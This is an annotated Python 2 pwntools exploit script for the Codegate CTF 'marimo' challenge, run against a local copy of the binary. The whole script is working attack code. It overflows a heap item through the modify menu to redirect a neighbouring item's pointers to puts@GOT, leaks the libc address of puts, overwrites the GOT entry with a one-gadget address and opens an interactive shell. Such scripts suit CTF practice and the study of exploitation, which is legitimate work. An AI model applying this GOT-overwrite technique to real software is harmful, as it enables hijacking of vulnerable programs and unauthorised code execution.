exploit code
# Python 2 pwntools script (print statements, str payloads) for the Codegate
# "marimo" challenge. It talks to a local copy of the binary over its menu
# prompts (">>"), leaks a libc address through puts@GOT, then writes a
# libc-relative address back through the same menu.
from pwn import *
import time


def show_me_the_marimo(name, profile):
    """Drive the binary's "show me the marimo" menu entry.

    Sends the command, then ``name`` and ``profile`` as two follow-up
    answers, reading up to the ">>" prompt after each. Uses the
    module-global tube ``r`` created in ``__main__``.
    """
    r.sendline("show me the marimo")
    print r.recvuntil(">>")
    r.sendline(name)
    print r.recvuntil(">>")
    r.sendline(profile)
    print r.recvuntil(">>")


def view(select):
    """Select the "V" menu entry and pick the item numbered ``select``.

    Does not consume the prompt that follows; callers read it themselves.
    """
    r.sendline("V")
    print r.recvuntil(">>")
    r.sendline(select)


if __name__ == "__main__":
    binary = "./marimo"
    elf = ELF(binary)
    r = process(binary)
    #strcmp_got = elf.got['strcmp']
    # Address of the puts GOT slot in the (non-PIE, assumed) binary; it is
    # used both as the leak target and, later, as the write target.
    # Full RELRO would make this slot read-only and stop the second step.
    puts_got = elf.got['puts']
    print r.recvuntil(">>")
    # Two objects are created so that the second lies after the first;
    # the overflow below is written through item 0 and read through item 1.
    show_me_the_marimo("A"*4, "B"*4)
    show_me_the_marimo("C"*4, "D"*4)
    # NOTE(review): reason for the delay is not visible here -- presumably the
    # binary gates something on elapsed time; confirm against the challenge.
    time.sleep(3)
    # 52 bytes of filler, a 4-byte zero, then two pointers to puts@GOT. The
    # pointer fields appear to be the neighbouring item's name/profile
    # pointers, so viewing item 1 afterwards prints the GOT contents
    # (i.e. the resolved libc address of puts) instead of its strings.
    payload = "A"*52
    payload += p32(0x0)
    payload += p64(puts_got)
    #payload += p64(strcmp_got)
    payload += p64(puts_got)
    view("0")
    print r.recvuntil(">>")
    # "M" is the modify entry; the oversized value is what corrupts item 1.
    r.sendline("M")
    print r.recvuntil(">>")
    r.sendline(payload)
    #pause()
    print r.recvuntil(">>")
    r.sendline("B")
    print r.recvuntil(">>")
    view("1")
    print r.recvuntil("name : ")
    # Read the 6 significant bytes of the little-endian 64-bit pointer and
    # zero-pad to 8 before unpacking.
    libc_puts = u64(r.recv(6).ljust(8, "\x00"))
    print r.recvuntil(">>")
    log.info("libc_puts = {}".format(hex(libc_puts)))
    # Hard-coded distance from puts to the chosen gadget; this is specific to
    # the challenge's libc build and will not transfer to another version.
    libc_oneshot = libc_puts - 0x2a47a
    log.info("oneshot = {}".format(hex(libc_oneshot)))
    # Modify again: item 1's name pointer now points at puts@GOT, so writing
    # through it replaces the GOT entry with the computed address.
    r.sendline("M")
    print r.recvuntil(">>")
    #pause()
    r.sendline(p64(libc_oneshot))
    #pause()
    r.interactive()